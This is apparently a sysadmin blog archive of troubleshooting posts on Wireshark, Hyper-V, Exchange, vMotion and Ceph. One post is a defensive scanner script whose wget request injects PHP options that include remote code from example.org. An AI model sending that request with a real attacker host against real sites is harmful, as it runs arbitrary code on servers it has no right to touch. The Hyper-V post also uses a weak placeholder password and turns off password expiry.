Category Archives: Solved

Beyond ping: Detect packet drop within TCP session

What do you do if a particular website or a particular web service is crawling and yet pings, mtr traceroutes come back perfect?   Or what if you can’t ping at all because of firewall in the way?   Is something throttling this specific connection on the remote end?

The way to look under the hood is to look at the specific TCP session and see how it’s performing.   This is where wireshark comes to the rescue with the following metrics:

  • Packet Loss:   Filter by criteria “tcp.analysis.lost_segment”
  • Up/down throughput:  Go to statistics -> Conversations -> scroll all the way right for “bps” stats
  • Latency: Select TCP packet in question -> Expand TCP SEQ/ACK analysis -> look for RTT to ACK

 

Howto Run Hyper-V 2016 Core without Domain Controller

Hyper-V offers a free version.  The catch is that it is the core Hyper-V without the Windows interface. That’s fine because none of the other hypervisors such as XenServer or ESXi have a graphical interface running on the hypervisor itself either. The trouble is that Microsoft makes working with Hyper-V without a GUI very tricky, unless you join it to a domain. In my opinion joining a hypervisor to a domain is undesirable. Either you have to run a domain controller as a VM creating a weird chicken-and-egg problem, or alternatively you have to run the domain controller as a separate physical host – who in this day and age wants to do that though?

The solution to all this is to jump through couple extra hoops and run Hyper-V without domain controller.

  1. Pick a management machine.  Let’s call it MANAGE01.  Preferably Windows 10 Pro.  In my tests I didn’t have it joined to a domain.  Add user called Admin with password xyz.
  2. Install Hyper-V 2016 on server.  At the end of the installation create a new user called Admin with password xyz (important that username and password matches exactly with step 1).   Change host name to HYPER-V01  (Optional: enable Remote desktop and enable pings)
  3. On MANAGE01 do these steps:
    1. edit hosts file and add entry 1.2.3.4 HYPER-V01
    2. Open Powershell with admin privileges,
    3. Start-Service WinRM
    4. winrm set winrm/config/client ‘@{TrustedHosts=”HYPER-V01″}’
    5. Stop-Service WinRM
    6. Open Hyper-v Manager, and `connect to server`
    7. Enter HYPER-V01
  4. Done

For multiple hosts the command is

winrm set winrm/config/client '@{TrustedHosts="HYPER-V01,HYPER-V02"}'

To get replication you need to do the following:

  • netsh advfirewall firewall add rule name=”Open Port 443″ dir=in action=allow protocol=TCP localport=443
  • Install self signed SSL certificates

Password expiry can be a problem when running without DC.  For that reason it’s best to disable password expiry on all hosts

NET accounts /MAXPWAGE:UNLIMITED

 

Solved: Outlook 2016 to Exchange 2010 setup

  • Tried to do automatic setup in Outlook 2016 and it failed (kept prompting me for password during autodiscovery), So I thought I will do manual setup instead
  • Manual setup failed with “Log onto Exchange ActiveSync mail Server (EAS): The server cant be found”  Which is weird because Microsoft Remote Connectivity Analyzer succeeded.  Also, setting up the account on Android Phone which uses Active Sync worked.  So why is it complaining that Active Sync is broken?    Turns out that EAS is special type of ActiveSync that’s only compatible with outlook.com.  So that’s a dead end
  • Went back to auto discovery and this time I filled it out with Name, Email address, and Password.  When it prompted me for the password the second time, I changed the username to DOMAIN\username and filled in the same password.  
  • It worked

I guess the proper way is to map DOMAIN\username to username@domain.com, but this does work as a workaround.

Troubleshooting vMotion “failed to resume” [Solved]

I got the following error when trying to vMotion a VM from one SAN to another.

The VM failed to resume on the destination during early power on.

First I tried looking at ESXi host /var/log/vmkernel.log but in there all I got was

 Migration considered a failure by the VMX.  It is most likely a timeout, but check the VMX log for the true error.

Because this failure happened so late in the process (around 72%)  I realized that it’s probably failing during resume.  It turns out that during storage migration the machine gets suspended for a very short period of time and has to start back up (with the new disk attached underneath).  Well this made me look at the VM’s own vmware.log … sure enough I found the smoking gun there

[msg.loader.biosfd] Could not open bios.440.rom (No such file or directory).

That’s when I realized that when I set this up long ago, I was forced to use a workaround of including this special bios.440.rom file along with the VM to make it compatible with the OS.  Sure enough, so many months later I forgot about it.  After I copied the file across to the destination manually, the migration succeeded without a problem.

PHP URL include vulnerability detection and workaround

Some exploits never get old.  One such example is an exploit that takes advantage of PHP URL include vulnerability.   It’s particularly nasty because it lets the attackers execute arbitrary PHP code without leaving any trace on the server it self.  The whole exploit executes in memory and vanishes once the attacker got what they were after.    With no back doors left behind, there are only two ways to find out.  You can either spot the suspicious entry in your log files, or you can run a script that checks whether your server is vulnerable to the attack in the first place.

#!/bin/bash

if [ -z "$1" ]; then

        echo "Error, must specify domain name"

        exit 0

fi

#do not change example.org this is one of the rare cases, when it serves an actual function.

wget -q -O test http://$1/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://example.org

grep "This domain is established to be used for illustrative examples" test > /dev/null

if [ $? -eq 0 ]; then

        echo

        echo "$1 is VULNERABLE add the following to .htaccess file and retry"

        echo

        echo "RewriteEngine on"

        echo "RewriteCond %{QUERY_STRING} ^[^=]*$"

        echo "RewriteCond %{QUERY_STRING} %2d|- [NC]"

        echo "RewriteRule .? – [F,L]"

        echo

else

        echo

        echo "$1 is OK"

fi

When you run this tool, you will see this if the web site you are scanning is vulnerable:

# ./test-url-include.sh vulnerablesite.com

vulnerablesite.com is VULNERABLE add the following to .htaccess file and retry

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|- [NC]
RewriteRule .? – [F,L]

I should add that the proper way is to patch PHP to a version that doesn’t have the vulnerability. The .htaccess fix works, but as you can imagine, it’s a bandaid solution. If you have this vulnerability, chances are you also have many more like it.

Changing Ceph Configuration on all Nodes

One question regarding Ceph that comes up frequently is:  Where do you change ceph.conf file?  On admin node?  On each node manually?  Or will it magically replicate on it’s own?

The answer is that you change the the ceph.conf only in one place.  You change it on the admin node and use ceph-deploy to deploy the changes on all other nodes

For example: if you have a cluster consisting of n0, n1 and n2, you would do it like this

#login to admin node
cd my-cluster 
ceph-deploy --overwrite-conf admin n0 n1 n2

 

Handling Ceph near full OSDs

Running Ceph near full is a bad idea.   What you need to do is add more OSDs to recover.    However, during testing it will inevitably happen.  It can also happen if you have plenty of disk space, but the weights were wrong.  UPDATE: even better, calculate how much space you really need to run ceph safely ahead of time.  If you have to resort to handling near full OSDs, your assumptions about safe utilization are probably wrong.

Usually when OSDs are near full, you’ll notice that some are more full than others.   Here are the ways to fix it:

Decrease the weight of the OSD that’s too full.  That will cause data to be moved from it to OSDs that are less full.

ceph osd crush reweight osd.[x] [y]  

x is the OSD id, y is the new weight, be careful making big changes, usually even a small incremental change is sufficient

Temporarily decrease the weight of the OSD.  This is same as above except that the change is not permanent

ceph osd reweight [id] [weight]

id is the OSD# and weight is value from 0 to 1.0 (1.0 no change, 0.5 is 50% reduction in weight)

for example:
ceph osd reweight [14] [0.9]

 

Let Ceph reweight automatically

ceph osd reweight-by-utilization [percentage]

Reweights all the OSDs by reducing the weight of OSDs which are heavily overused. By default it will adjust the weights downward on OSDs which have 120% of the average utilization, but if you include threshold it will use that percentage instead

Slow VMWare performance iscsi tgt and ceph [Solved]

After a lot of head scratching and googling I finally discovered why my ceph performance was so slow compared to NFS when using iscsi tgs on my gateway.   I was getting only 0.1 MB/s compared to 90 MB/s that I was getting through NFS.  It turns out that ESXi had hardware acceleration (VAAI) turned on for it’s iSCSI initiator – apparently it’s something that isn’t compatible with tgt.  To turn it off I followed these steps

Turning off VAAI

I didn’t even have to reboot, or reload any configuration.  The effect was immediate jump in performance back to normal.